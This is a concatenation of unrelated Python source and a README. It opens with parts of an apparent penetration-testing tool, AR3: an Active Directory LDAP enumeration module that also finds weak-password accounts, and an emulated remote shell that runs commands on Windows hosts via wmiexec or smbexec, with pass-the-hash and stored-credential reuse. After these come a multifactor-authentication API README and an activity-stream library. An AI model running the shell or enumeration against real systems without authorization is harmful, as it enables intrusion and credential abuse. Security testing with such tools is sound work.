def custom_handler(args, logger, host, ip, key, data, title):
    """Display one record from a custom query under the given *title*."""
    if args.data_only:
        logger.output(key)
        return
    for attribute, value in data.items():
        if args.parse and attribute.lower() in ['info','comment','description']:
            attribute_parser(logger, host, ip, key, attribute, value)
        if args.verbose:
            logger.info([host, ip, title.upper(), "{:<35} {:<24} : {}".format(key, attribute, value)])
        else:
            # Non-verbose: one line per record, then stop
            logger.info([host, ip, title.upper(), key])
            return
def create_con(args, loggers, db_obj):
    # NOTE(review): appears unused -- the connection is created and then
    # discarded (no return value); LDAPHandler.create_ldap_con is the path
    # actually exercised by main(). Confirm before removing.
    query = LdapCon(args, loggers, args.ldap_srv, db_obj)
    query.create_ldap_con()
#########################
# Recon
#########################
def recon(args, query, loggers, db_obj):
    """
    Run the full domain recon sweep (domain, users, groups, computers),
    reconnecting before each phase to avoid LDAP connection timeouts.
    """
    query.create_ldap_con()
    domain_query(args, query.con, loggers, db_obj)
    query.close()

    query.create_ldap_con()
    # NOTE(review): "{active}" looks like a filter token consumed by
    # LdapCon.user_query -- confirm against ar3.core.ldap
    user_query(args, query.con, loggers, db_obj, user_lookup="{active}")
    query.close()

    query.create_ldap_con()
    group_query_all(args, query, loggers, db_obj)
    query.close()

    query.create_ldap_con()
    computer_query(args, query.con, loggers, db_obj)
#########################
# Connection
#########################
class LDAPHandler():
    """
    Small class to handle ldap connection. Otherwise we receive a timeout
    error when attempting multiple queries on the same connection.
    """
    def __init__(self, args, loggers, db_obj):
        self.con = False     # live LdapCon instance, or False before first connect
        self.count = 0       # number of (re)connections made so far
        self.args = args
        self.loggers = loggers
        self.db = db_obj

    def create_ldap_con(self):
        """Tear down any existing connection and open a fresh one; the
        success banner is printed on the first connection only."""
        try:
            if self.con:
                self.con.close()
            self.con = LdapCon(self.args, self.loggers, self.args.ldap_srv, self.db)
            self.con.create_ldap_con()
            self.count += 1
            if self.count == 1:
                # Output formatting indicating a successful connection
                self.loggers['console'].success(['LDAP Connection','Connection established (server: {}) (LDAPS: {})'.format(self.con.host,self.con.ldaps)])
        except Exception as e:
            raise Exception(e)

    def close(self):
        # Close the underlying connection if one is open
        if self.con:
            self.con.close()
#########################
# Main
#########################
def main(args, config_obj, db_obj, loggers):
    """Entry point for the 'query' op.

    Dispatches each requested query type over a fresh LDAP connection
    (LDAPHandler reconnects before every phase to dodge server timeouts).
    """
    try:
        query = LDAPHandler(args, loggers, db_obj)
        if args.recon:
            recon(args, query, loggers, db_obj)
        if args.qdomain:
            query.create_ldap_con()
            domain_query(args, query.con, loggers, db_obj)
        if args.trust:
            query.create_ldap_con()
            trust_query(args, query.con, loggers, db_obj)
        if args.users:
            query.create_ldap_con()
            user_query(args, query.con, loggers, db_obj, user_lookup=args.query)
        if args.groups:
            query.create_ldap_con()
            if args.all:
                # --all enumerates every group and its members
                group_query_all(args, query, loggers, db_obj)
            else:
                group_query(args, query.con, loggers, db_obj, group_lookup=args.query)
        if args.computers:
            query.create_ldap_con()
            computer_query(args, query.con, loggers, db_obj)
        if args.pass_never_expire:
            query.create_ldap_con()
            custom_query(args, QUERIES['pass_never_expire'], ATTRIBUTES['users'] + args.attrs, query.con, loggers, db_obj, title="PASS NEVER EXPIRE ")
        if args.pass_not_required:
            query.create_ldap_con()
            custom_query(args, QUERIES['pass_not_required'], ATTRIBUTES['users'] + args.attrs, query.con, loggers, db_obj, title="PASS NOT REQUIRED ")
        if args.reversible_encryption:
            query.create_ldap_con()
            custom_query(args, QUERIES['reversible_encryption'], ATTRIBUTES['users'], query.con, loggers, db_obj, title="REVERSIBLE ENCRYPTION ")
        if args.custom:
            query.create_ldap_con()
            custom_query(args, args.custom, args.attrs, query.con, loggers, db_obj)
        query.close()
    except Exception as e:
        if "invalidCredentials" in str(e):
            loggers['console'].fail(["LDAP Error", "Authentication failed"])
        else:
            loggers['console'].fail(["Query Error", str(e)])
import argparse
from getpass import getpass
def shell_args(sub_parser):
    """Register the 'shell' sub-command and its options.

    BUG FIX: -t (timeout) previously lived in the mutually exclusive group
    alongside -d/--local-auth, so a timeout could not be combined with a
    domain. The timeout is independent of authentication mode and is now a
    plain argument.
    """
    # Create Subparser
    shell_parser = sub_parser.add_parser("shell", help='- Spawn emulated shell on system')
    shell_parser.add_argument('-t', dest='timeout', type=int, default=5,help='Connection timeout')

    # Domain vs local authentication are mutually exclusive
    shell_domain = shell_parser.add_mutually_exclusive_group(required=False)
    shell_domain.add_argument('-d', dest='domain', type=str, default='', help='Set domain (Default=null)')
    shell_domain.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')

    shell_parser.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for shell access')
    shell_parser.add_argument('-u', dest='user', type=str, default='', help='Admin Username')
    # Password and hash are mutually exclusive authentication mechanisms
    shell_pwd = shell_parser.add_mutually_exclusive_group(required=False)
    shell_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
    shell_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')

    execution = shell_parser.add_argument_group("Command Execution")
    execution.add_argument('--exec-method', dest='exec_method', type=str, default='wmiexec',help='Code execution method {wmiexec, smbexec}')
    execution.add_argument('--exec-ip', dest='exec_ip', type=str, default='127.0.0.1',help='Set server used for code execution output')
    execution.add_argument('--exec-share', dest='exec_share', type=str, default='C$',help='Set share used for code execution output')
    execution.add_argument('--exec-path', dest='exec_path', type=str, default='\\Windows\\Temp\\',help='Set path used for code execution output')
    execution.add_argument('--fileless', dest='fileless', action='store_true',help='Spawn SMB server for code execution output')

    # Hidden Args: Required for execution methods to work but not applicable to the operational mode
    execution.add_argument('--ps_execute', dest='ps_execute', action='store_true',help=argparse.SUPPRESS)
    execution.add_argument('--fileless_sharename', dest='fileless_sharename', type=str, default='',help=argparse.SUPPRESS)
    execution.add_argument('--no-output', dest='no_output', action='store_true', help=argparse.SUPPRESS)
    execution.add_argument('--slack', dest='slack', action='store_true', help=argparse.SUPPRESS)

    shell_parser.add_argument(dest='target', nargs='+', help='System to generate simulated shell')
def shell_arg_mods(args, db_obj, loggers):
    """Resolve credentials for the shell op and print the auth summary.

    Prompts for a password when none was supplied, or pulls a stored
    credential set from the AR3 database when -id is used without -u.
    Returns the modified args namespace (target collapsed to one host).
    """
    console = loggers['console']

    if args.user and not args.passwd and not args.hash:
        # Get password if not provided
        args.passwd = getpass("Enter password, or continue with null-value: ")

    if args.cred_id and not args.user:
        stored = db_obj.extract_user(args.cred_id)
        if not stored:
            console.fail("Unable to gather credentials from db, check workspace and try again")
            exit(1)
        row = stored[0]
        args.user = row[0]
        args.passwd = row[1]
        args.hash = row[2]
        args.domain = row[3]

    # Only a single target host is supported by the shell
    args.target = args.target[0]

    if args.hash:
        console.status(['Shell Authentication: {}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
    else:
        console.status(['Shell Authentication: {}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
    return args
import os
from ar3.core.smb import SmbCon
from ar3.servers.smb import SMBServer
from ar3.core.connector import Connector
from ar3.helpers.misc import gen_random_string
from ar3.ops.enum.host_enum import code_execution
class AR3Shell(Connector):
    """Emulated interactive shell over remote SMB command execution.

    Commands typed at the prompt are executed on the target through the
    configured exec method (wmiexec/smbexec); their stdout is captured into
    self.output and echoed back. The working directory is tracked
    client-side only (pwd_list) -- nothing actually 'cd's on the target.
    """
    def __init__(self, args, db_obj, config_obj, loggers):
        Connector.__init__(self, args, loggers, args.target)
        self.output = []                                # stdout lines of the last remote command
        self.pwd_list = ['C:', 'Windows', 'System32']   # emulated CWD components
        self.pwd = '\\'.join(self.pwd_list)
        self.exec_method = args.exec_method
        self.sharename = args.fileless_sharename
        self.db = db_obj
        self.config_obj = config_obj

        try:
            # Setup Smb Connection
            self.logger.status('Initiating remote connection')
            self.smbcon = SmbCon(self.args, loggers, self.host, self.db)
            self.smbcon.create_smb_con()

            # Execute command to verify permissions
            self.cmd_execution('ECHO %USERDOMAIN%\%USERNAME%')
            self.logger.success('Starting emulated shell (Host: {}) (User: {}) (Method: {}) (Fileless: {})'.format(self.host, self.output[0].strip(), self.exec_method, str(args.fileless)))
            self.logger.warning("This is a limited shell and requires full paths for file interactions\n")
        except Exception as e:
            self.logger.fail("Error Starting Shell: {}".format(str(e)))
            exit(1)

    def help(self):
        # Static usage text for the emulated shell
        print("""
   help                               - show this menu
   exit                               - Close shell

   Navigation:
   pwd                                - Show PWD
   dir                                - List PWD
   cd                                 - Change directory

   File Interactions:
   type [remote_file]                 - Show file contents (Full Path Required)
   download [remote_file] [location]  - Download remote file (Full Path Required)
   upload [local_file] [location]     - Upload local file (Full Path Required)
   delete [remote_file]               - Delete remote file (Full Path Required)

   Commands:
   [cmd]                              - Execute remote cmd
   """)

    def cd(self, cmd):
        """Emulate 'cd' by editing the client-side pwd_list."""
        if cmd.startswith('cd'):
            try:
                cd_path = cmd.split(' ')[1]
                cd_split = cd_path.replace("\\", "/").split("/")  # Input formatting
                cd_split = [x for x in cd_split if x]             # Remove blanks

                if cd_path == "/" or cd_path == "\\":
                    # Drive root
                    self.pwd_list = ['C:']
                # Dir up
                elif cd_split[0] == "..":
                    self.pwd_list.pop(-1)
                    cd_split.pop(cd_split.index(".."))
                # new dir (absolute path)
                elif cd_path.startswith(("/", "\\")):
                    self.pwd_list = ['C:']
                self.pwd_list = self.pwd_list + cd_split
            except:
                # BUG FIX: was self.logger.FAIL (no such method), which raised
                # AttributeError instead of reporting the failure.
                self.logger.fail('Unable to change directories')

    def dir(self, cmd):
        """'dir' alone lists the emulated PWD; otherwise run cmd as given."""
        if cmd == "dir":
            return self.cmd_execution("dir {}".format(self.pwd))
        else:
            return self.cmd_execution(cmd)

    def download(self, cmd):
        """download [remote_file] [location] -- copy a remote file locally."""
        try:
            val = cmd.split(" ")
            self.smbcon.downloadFile(val[1], val[2])
            self.logger.success("Download Complete: {}".format(val[2]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Download Failed: {}".format(str(e)))

    def upload(self, cmd):
        """upload [local_file] [location] -- push a local file to the target."""
        try:
            val = cmd.split(" ")
            self.smbcon.uploadFile(val[1], val[2])
            self.logger.success("Upload Complete: {}".format(val[2]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Upload Failed: {}".format(str(e)))

    def delete(self, cmd):
        """delete [remote_file] -- remove a file from the target."""
        try:
            val = cmd.split(" ")
            self.smbcon.deleteFile(val[1])
            # BUG FIX: success message previously said "Download Complete"
            self.logger.success("Deletion Complete: {}".format(val[1]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Deletion Failed: {}".format(str(e)))

    def cmd_execution(self, cmd):
        """Run cmd remotely and capture its stdout lines into self.output."""
        resp = code_execution(self.smbcon, self.args, self.host, self.loggers, self.config_obj, cmd, return_data=True)
        self.output = resp.splitlines()

    def cmdloop(self):
        """Main REPL: read a command, dispatch it, echo captured output."""
        while True:
            try:
                # init prompt
                self.output = []
                self.pwd = '\\'.join(self.pwd_list)
                cmd = input("{}> ".format(self.pwd))
                cmd = cmd.lstrip().rstrip()
                self.logger.debug("User cmd ::: \'{}\'".format(cmd))

                # Handle CMD input
                if cmd == "help":
                    self.help()
                elif cmd == 'exit':
                    try:
                        self.smbcon.close()
                    except:
                        pass
                    return True
                elif cmd.startswith('cd'):
                    self.cd(cmd)
                elif cmd.startswith('dir'):
                    self.dir(cmd)
                elif cmd.startswith('download'):
                    self.download(cmd)
                elif cmd.startswith('upload'):
                    self.upload(cmd)
                elif cmd.startswith('delete'):
                    self.delete(cmd)
                elif cmd == 'pwd':
                    self.logger.output(self.pwd)
                else:
                    # BUG FIX: cmd_execution() returns None and populates
                    # self.output itself; assigning its return value here
                    # wiped the captured output and broke the echo loop below.
                    self.cmd_execution(cmd)

                # Show cmd Output
                for result in self.output:
                    self.logger.output(result)
            except KeyboardInterrupt:
                try:
                    self.smbcon.close()
                except:
                    pass
                return True
            except Exception as e:
                self.logger.debug(str(e))
def main(args, config_obj, db_obj, loggers):
    """Entry point for the 'shell' op.

    Optionally starts a local SMB server (fileless output capture), runs
    the interactive shell loop, then tears everything down.
    """
    shell = None
    smb_srv_obj = None
    try:
        # Init smb server
        if args.fileless:
            # Start smbserver with a throwaway hidden share name
            setattr(args, 'fileless_sharename', 'TEMP-{}$'.format(gen_random_string()))
            smb_srv_obj = SMBServer(loggers['console'], args.fileless_sharename, verbose=args.debug)
            smb_srv_obj.start()

        # Enter CMD Loop
        shell = AR3Shell(args, db_obj, config_obj, loggers)
        shell.cmdloop()

        # Close smbserver & exit
        if args.fileless:
            smb_srv_obj.cleanup_server()
            smb_srv_obj.server = None
            # Hard exit: server threads may otherwise keep the process alive
            os._exit(0)
    except KeyboardInterrupt:
        # Cleanup and close
        if shell:
            shell.smbcon.close()
        if smb_srv_obj:
            smb_srv_obj.cleanup_server()
        return
# Activeconnect
[Activeconnect](https://activeconnect.io) provides multifactor identity and presence verification.
This library provides a Python wrapper for the Activeconnect API.
## Getting Started
### Create an Activeconnect Account
To begin visit [Activeconnect Developer Portal](https://activeconnect.activeapi.ninja/register) to register.
### Create an Activeconnect Application
Once you have registered [create a new Activeconnect application](https://activeconnect.activeapi.ninja/create_application).
Save the Application ID and Application Secret in a safe place as you will need this to authenticate calls to the Activeconnect API.
### Register Users
Activeconnect identifies application users using a token supplied by the application developer.
You can use your existing user IDs or create a lookup table that maps your user ID to a value you provide to Activeconnect.
Users are registered using the Activeconnect ManagementAPI.
Create an instance of Activeconnect.ManagementAPI using your application ID and secret.
```python
from Activeconnect.management_api import ManagementAPI
from Activeconnect.management_api import ManagementAPIResult
application_id = "MY APPLICATION ID"
application_secret = "MY APPLICATION SECRET"
manager = ManagementAPI(application_id="MY APPLICATION ID", application_secret="MY APPLICATION SECRET")
```
To add a single user call ManagementAPI.add_user
```python
add_user_result = manager.add_user("MY USER")
if add_user_result == ManagementAPIResult.success:
# User added
print("user added")
elif add_user_result == ManagementAPIResult.user_exists:
# User already exists
print("user already exists")
else:
# User failed
print("add user failed")
```
To add multiple users call ManagementAPI.add_users.
```python
users = ["MY USER 1", "MY USER 2", "MY USER 3"]
created, existing = manager.add_users(users)
if created is not None:
print("Users created: {}".format(created))
if existing is not None:
print("Existing users: {}".format(existing))
```
### Registering a Mobile Device
Activeconnect uses a mobile device to collect authentication data.
Mobile devices are registered using a registration link generated by Activeconnect.
The Activeconnect mobile application is registered to open these links and register the device.
To obtain a registration link use ManagementAPI.get_registration_link.
The display_name query parameter is optional and is used by the Activeconnect mobile app to provide a description of the user.
```python
registration_link = manager.get_registration_link(user_id="MY USER 1", display_name="MY USER 1@myapp")
```
ManagementAPI also provides a helper method to send a registration link to a mobile device using SMS.
```python
manager.send_registration_sms( user_id="MY USER 1",
display_name="MY USER1@myapp",
phone_number="+1XXXYYYY",
message=None)
```
You can specify a message for the SMS body
```python
manager.send_registration_sms( user_id="MY USER 1",
display_name="MY USER1@myapp",
phone_number="+1XXXYYYY",
message="REGISTER FOR MY APP")
```
### Checking Device Registration
Before a user can authenticate using Activeconnect they must register a mobile device.
To check if a user has registered a mobile device use ManagementAPI.has_registered_mobile_device
```python
has_device = manager.has_registered_mobile_device("MY USER 1")
if has_device is ManagementAPIResult.has_mobile_device:
print("User has mobile device.")
elif has_device is ManagementAPIResult.no_mobile_device:
print("User has no mobile device.")
else:
print("has_registered_mobile_device failed.")
```
### Removing Users
To remove a single user use ManagementAPI.delete_user
```python
manager.delete_user("MY USER 1")
```
To remove multiple users use ManagementAPI.delete_users
```python
users=["MY USER 1", "MY USER 2",...]
manager.delete_users(users)
```
### Authenticating Users
Activeconnect authentication is a multi step process:
* Initiate the authentication process using the Authentication API.
* If the process is initiated the mobile device will collect authentication data and send it to Activeconnect
* Activeconnect processes the collected data and determines whether the user is authenticated.
Create an instance of Activeconnect.AuthenticationAPI using the application ID and application secret created above.
```python
from Activeconnect.authentication_api import AuthenticationAPI,AuthenticationMethod
authenticator=AuthenticationAPI(application_id="MY APPLICATION ID",
application_secret="MY APPLICATION SECRET")
# Initiate the authentication process.
session = authenticator.authenticate_user("MY USER 1")
# Check if authentication started.
if session.failed:
# Authentication failed - check the failure reason.
# If the user has not registered a mobile device, the failure_reason will be NO_MOBILE_DEVICE
print("Authentication failed {}".format(session.failure_reason))
elif session.in_progress:
# Authentication is in progress
print("Authentication in progress")
else:
print("Session status is {}".format(session.session_status.name))
```
Once the authentication process is initiated periodically check the status of the session using Activeconnect.Session.get_status.
```python
# Wait for the user to approve the request.
while session.in_progress:
# Get the status of the session
session_status = session.get_status()
# Wait a while and try again
time.sleep(5)
if session.active:
print("authenticated")
# Now end the session
session.destroy()
else:
print("Authentication failed {}".format(session.session_status.name))
```
### Ending a Session
To end an Activeconnect session call Activeconnect.Session.destroy.
```python
session.destroy()
```
### Session Serialization
It may be necessary to save session information in cookies or pass session information with URLS.
Activeconnect.Session is derived from [marshmallow dataclass](https://pypi.org/project/marshmallow-dataclass/) and can be serialized as JSON.
```python
# Save a session as JSON
session_json=Session.Schema().dumps(session)
# Load a session from JSON
new_session=Session.Schema().loads(session_json)
```
It is recommended that the generated JSON is encrypted before storing.
One way to do this is to use [the itsdangerous package](https://pypi.org/project/itsdangerous/).
```python
from itsdangerous.url_safe import URLSafeSerializer
# Convert the session to JSON.
session_json=Session.Schema().dumps(session)
# Encode/encrypt the session JSON
s = URLSafeSerializer("secret-key")
session_token = s.dumps(session_json)
# Store the session_token...
``` | Activeconnect | /Activeconnect-0.0.10.tar.gz/Activeconnect-0.0.10/README.md | README.md |
import abc
class NodeBase:
    """Base class for a single node in the activity network.

    :ivar node_id: String that uniquely identifies this node in the network.
    """

    def __init__(self):
        # Concrete subclasses are expected to assign a real identifier.
        self.node_id = None
class ActivityObjectBase:
    """Base class for anything that can take part in an Activity.

    :ivar activity_name str:
        Unicode representation of this object.
    :ivar activity_url str:
        URL of this object.
    :ivar activity_extras dict:
        A BSON-serializable dict of extra stuff to store on the activity.
    """

    def __init__(self):
        self.activity_name = None
        self.activity_url = None
        # A fresh dict per instance — never shared between objects.
        self.activity_extras = {}
class ActivityBase:
    """The story of a person performing an action on or with an object.

    An activity consists of an actor, a verb, an object, and optionally
    a target.

    :ivar actor:
        The actor (subject) of the Activity.
        Example: *John* posted a comment on ticket #42.
        :class:`NodeBase, ActivityObjectBase`
    :ivar verb:
        The verb of the Activity.
        Example: John *posted* a comment on ticket #42.
        :class:`str`
    :ivar obj:
        The object of the Activity.
        Example: John posted *a comment* on ticket #42.
        :class:`ActivityObjectBase`
    :ivar target:
        The optional target of the Activity.
        Example: John posted a comment on *ticket #42*.
        :class:`ActivityObjectBase`
    :ivar published:
        Datetime at which the Activity was published.
        :class:`datetime.datetime`
    """

    def __init__(self):
        # All fields start unset; serializing subclasses fill them in.
        self.actor = self.verb = self.obj = self.target = None
        self.published = None
class NodeManagerBase(metaclass=abc.ABCMeta):
    """Abstract manager for the graph of connected nodes.

    Implementations know how to connect and disconnect nodes and how to
    serialize the graph.
    """

    @abc.abstractmethod
    def follow(self, follower, following):
        """Add a directed edge from :class:`NodeBase` ``follower`` to
        :class:`NodeBase` ``following``.
        """
        return

    @abc.abstractmethod
    def unfollow(self, follower, following):
        """Remove the directed edge from :class:`NodeBase` ``follower`` to
        :class:`NodeBase` ``following``.
        """
        return
class ActivityManagerBase(metaclass=abc.ABCMeta):
    """Abstract serializer for :class:`ActivityBase` objects."""

    @abc.abstractmethod
    def create(self, actor, verb, obj, target=None):
        """Build and persist an :class:`ActivityBase`."""
        return
import logging
import threading
from pkg_resources import iter_entry_points
from .managers import NodeManager, ActivityManager, Aggregator
from .storage import pymongostorage
log = logging.getLogger(__name__)
_director = None
class ActivityDirector(threading.local):
    """Facade over the node manager, activity manager and aggregator.

    Thread-local, so each thread gets its own manager instances.  Each of
    the default implementations can be overridden via an 'activitystream'
    setuptools entry point of the same name.
    """

    def __init__(self, **conf):
        self._default_impls = {
            'director': ActivityDirector,
            'storage': pymongostorage.PymongoStorage,
            'nodemanager': NodeManager,
            'activitymanager': ActivityManager,
            'aggregator': Aggregator,
        }
        self.conf = conf
        self.entry_points = self._load_entry_points()
        # Wire the collaborators together; each one may be an entry-point
        # override of the stock implementation.
        storage = self._get_impl('storage')(conf)
        self.node_manager = self._get_impl('nodemanager')(storage)
        self.activity_manager = self._get_impl('activitymanager')(
            storage, self.node_manager)
        self.aggregator = self._get_impl('aggregator')(
            self.activity_manager, self.node_manager)

    def _load_entry_points(self):
        """Map entry-point name -> loaded object for group 'activitystream'."""
        eps = iter_entry_points(group='activitystream')
        return {ep.name: ep.load() for ep in eps}

    def _get_impl(self, name):
        """Return the entry-point override for ``name``, or the default."""
        default = self._default_impls.get(name)
        return self.entry_points.get(name, default)

    def connect(self, follower, following):
        """Make ``follower`` follow ``following``."""
        self.node_manager.follow(follower, following)

    def disconnect(self, follower, following):
        """Make ``follower`` stop following ``following``."""
        self.node_manager.unfollow(follower, following)

    def is_connected(self, follower, following):
        """True if ``follower`` currently follows ``following``."""
        return self.node_manager.is_following(follower, following)

    def create_activity(self, actor, verb, obj, target=None,
                        related_nodes=None, tags=None):
        """Create and store a new activity; see ActivityManager.create."""
        return self.activity_manager.create(actor, verb, obj, target=target,
                                            related_nodes=related_nodes,
                                            tags=tags)

    def create_timeline(self, node_id):
        """Create an up-to-date timeline for the ``node_id`` Node.
        """
        self.aggregator.create_timeline(node_id)

    def create_timelines(self, node_id):
        """Create an up-to-date timeline for the ``node_id`` Node and all of
        its followers.
        """
        self.create_timeline(node_id)
        node = self.node_manager.get_node(node_id)
        followers = node.followers if node else None
        if followers:
            for follower in self.node_manager.get_nodes(followers):
                self.create_timeline(follower.node_id)

    def get_timeline(self, *args, **kw):
        """Delegate to the aggregator's get_timeline."""
        return self.aggregator.get_timeline(*args, **kw)
def configure(**conf):
    """Build the global director from ``conf`` merged over built-in defaults.

    If an 'activitystream' entry point overrides the 'director'
    implementation, that class is instantiated instead of the stock
    :class:`ActivityDirector`.
    """
    global _director
    settings = {
        'activitystream.master': 'mongodb://127.0.0.1:27017',
        'activitystream.database': 'activitystream',
        'activitystream.activity_collection': 'activities',
        'activitystream.node_collection': 'nodes',
    }
    settings.update(conf)
    director = ActivityDirector(**settings)
    director_cls = director._get_impl('director')
    if director_cls != ActivityDirector:
        # An override exists: rebuild using the custom director class.
        director = director_cls(**settings)
    _director = director
def director():
    """Return the globally configured director (None until configure())."""
    # Reading a module global needs no `global` declaration.
    return _director
import datetime
import logging
import time
from contextlib import contextmanager
from operator import attrgetter
from . import base
from .storage.base import (
StoredActivity,
ActivityObject,
)
log = logging.getLogger(__name__)
class NodeManager(base.NodeManagerBase):
    """Maintains the network of connected nodes.

    All persistence is delegated to the injected storage backend; this
    class only knows how to wire edges and guard aggregation runs.
    """

    def __init__(self, storage):
        self.storage = storage

    def follow(self, follower, following):
        """Add a directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.
        """
        self.storage.create_edge(follower, following)

    def unfollow(self, follower, following):
        """Remove the directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.
        """
        self.storage.destroy_edge(follower, following)

    def is_following(self, follower, following):
        """True if a directed edge ``follower`` -> ``following`` exists."""
        return self.storage.edge_exists(follower, following)

    def get_node(self, node_id):
        """Fetch a single node by its id."""
        return self.storage.get_node(node_id)

    def get_nodes(self, node_ids):
        """Fetch all nodes whose ids appear in ``node_ids``."""
        return self.storage.get_nodes(node_ids)

    def create_node(self, node_id):
        """Create and persist a brand-new node."""
        return self.storage.create_node(node_id)

    def save_node(self, node):
        """Persist changes to an existing node."""
        return self.storage.save_node(node)

    @contextmanager
    def set_aggregating(self, node_id):
        """Context manager that flags ``node_id`` as aggregating.

        Yields the node, or None if an aggregation is already running.
        On exit the flag is cleared and the aggregation start time is
        recorded on the node (even if the body raises).
        """
        node = self.storage.set_aggregating(node_id)
        started_at = datetime.datetime.utcnow()
        try:
            yield node
        finally:
            if node:
                node.last_timeline_aggregation = started_at
                node.is_aggregating = False
                self.save_node(node)
class ActivityManager(base.ActivityManagerBase):
    """Persists :class:`Activity` objects via the storage backend."""

    def __init__(self, storage, node_manager):
        self.storage = storage
        self.node_manager = node_manager

    def create(self, actor, verb, obj, target=None, related_nodes=None, tags=None):
        """Create and persist an :class:`Activity`.

        One copy of the activity is stored for every participating node
        (actor, object, target, plus any ``related_nodes``) so that each
        node's activity stream is self-contained.  Returns the last copy
        written, or None if no participant has a ``node_id``.
        """
        participants = [actor, obj, target] + (related_nodes or [])
        owner_ids = [p.node_id for p in participants
                     if getattr(p, 'node_id', None)]
        activity = None
        for owner_id in owner_ids:
            activity = StoredActivity(
                actor=actor,
                verb=verb,
                obj=obj,
                target=target,
                published=datetime.datetime.utcnow(),
                node_id=owner_id,
                tags=tags,
            )
            self.storage.save_activity(activity)
        return activity

    def get_activities(self, nodes, since=None, sort=None, limit=0, skip=0, query=None):
        """Return all activities associated with the given nodes.

        Params:
            since (datetime) - return activities that have occured since this
                               datetime
        """
        return self.storage.get_activities(nodes, since=since, sort=sort,
                                           limit=limit, skip=skip, query=query)

    def save_timeline(self, node_id, activities):
        """Persist ``activities`` as the timeline of ``node_id``."""
        self.storage.save_timeline(node_id, activities)

    def get_timeline(self, node_id, sort=None, limit=0, skip=0, query=None):
        """Return the pre-aggregated timeline for ``node_id``."""
        return self.storage.get_timeline(node_id, sort=sort, limit=limit,
                                         skip=skip, query=query)
class Aggregator:
    """Creates a timeline for a given node in the network graph.

    A timeline is the filtered, de-duplicated, classified and scored list
    of activities from a node itself and from the nodes it follows.
    """
    def __init__(self, activity_manager, node_manager):
        self.node_manager = node_manager
        self.activity_manager = activity_manager
    def _unique_activities(self, activities):
        """Return a list of unique activities.

        Activities are duplicates when actor, obj, target and verb all
        serialize equal; the first occurrence wins.
        """
        attrs = ('actor', 'obj', 'target')
        seen, unique = [], []
        for activity in activities:
            d = {a: ActivityObject.to_dict(getattr(activity, a))
                 for a in attrs}
            d.update(verb=activity.verb)
            # dicts aren't hashable, so membership is a linear scan
            # (quadratic overall — acceptable for per-node batch sizes).
            if d in seen:
                continue
            seen.append(d)
            unique.append(activity)
        return unique
    def classify_activities(self, activities):
        """Return a list of activities with classification flags added.

        Hook for subclasses; the default implementation is a no-op.
        """
        return activities
    def create_timeline(self, node_id):
        """Create and store the timeline for a given node.

        If an aggregation is already running for the given node,
        ``set_aggregating`` yields None and a new aggregation will not be
        started (this method then does nothing).
        """
        with self.node_manager.set_aggregating(node_id) as node:
            if node:
                last_timeline_aggregation = node.last_timeline_aggregation
                # get a subset of the nodes being followed
                connections = []
                if node.following:
                    connections = self.filter_connections(
                        self.node_manager.get_nodes(node.following))
                activities = []
                if connections:
                    # retrieve the followed nodes' activities
                    activities = self.activity_manager.get_activities(connections,
                            since=last_timeline_aggregation)
                    # filter activities for followed nodes
                    activities = self.filter_activities(activities)
                # add activities for this node
                activities += self.activity_manager.get_activities([node],
                        since=last_timeline_aggregation)
                # if we don't have any new activities at this point, there's
                # nothing from which to generate a timeline.  (Returning from
                # inside the with-block still clears the aggregating flag in
                # set_aggregating's finally clause.)
                if not activities:
                    return
                # remove duplicates
                activities = self._unique_activities(activities)
                # classify and score activities
                activities = self.classify_activities(activities)
                activities = self.score_activities(activities)
                # save to this node's timeline
                self.activity_manager.save_timeline(node_id, activities)
    def needs_aggregation(self, node):
        """Return True if this node's timeline needs to be (re)aggregated.

        True when any activity exists — for the node or anyone it follows —
        newer than the last aggregation time.
        """
        last = node.last_timeline_aggregation
        nodes = [node]
        if node.following:
            nodes.extend(self.node_manager.get_nodes(node.following))
        # limit=1: we only care whether at least one new activity exists.
        activities = self.activity_manager.get_activities(nodes, since=last,
                limit=1)
        return bool(activities)
    def get_timeline(self, node, page=0, limit=100, actor_only=False, filter_func=None):
        """Return a (paged and limited) timeline for `node`.

        `page` is zero-based (page 0 is the first page of results).

        If `actor_only` == True, timeline will be filtered to only include
        activities where `node` is the actor.

        Pass a callable to `filter_func` to arbitrarily filter activities
        out of the timeline. `filter_func` will be passed an activity, and
        should return True to keep the activity in the timeline, or False
        to filter it out.

        Total size of the returned timeline may be less than `limit` if:
          1. the timeline is exhausted (last page)
          2. activities are filtered out by filter_func
        """
        node_id = node.node_id
        # Re-fetch so the aggregation metadata checked below is fresh.
        node = self.node_manager.get_node(node_id)
        page, limit = int(page), int(limit or 0)
        # Lazily (re)aggregate before reading the stored timeline.
        if not node or self.needs_aggregation(node):
            self.create_timeline(node_id)
        query_filter = {'actor.node_id': node_id} if actor_only else None
        timeline = self.activity_manager.get_timeline(
            node_id, sort=[('score', -1)], skip=page*limit, limit=limit,
            query=query_filter)
        if filter_func:
            timeline = list(filter(filter_func, timeline))
        return timeline
    def filter_connections(self, nodes):
        """Return a subset of a node's total outbound connections (nodes he is
        following) using the algorithm of your choice.

        Default implementation keeps everything (no-op hook).
        """
        return nodes
    def filter_activities(self, activities):
        """Return a subset of a node's activities using the algorithm of your
        choice.

        Default implementation keeps everything (no-op hook).
        """
        return activities
    def score_activities(self, activities):
        """Return a scored list of activities. By default, newer activities
        have higher scores.
        """
        # Score = seconds-since-epoch of the publish time (via local-time
        # mktime), so a descending sort on score yields newest-first.
        for a in activities:
            a.score = time.mktime(a.published.timetuple())
        return activities
from ..base import (
NodeBase,
ActivityBase,
ActivityObjectBase,
)
class StoredNode(NodeBase):
    """`NodeBase` plus the attributes persisted by `Storage` backends.

    :ivar followers: List of node ids that are following this node.
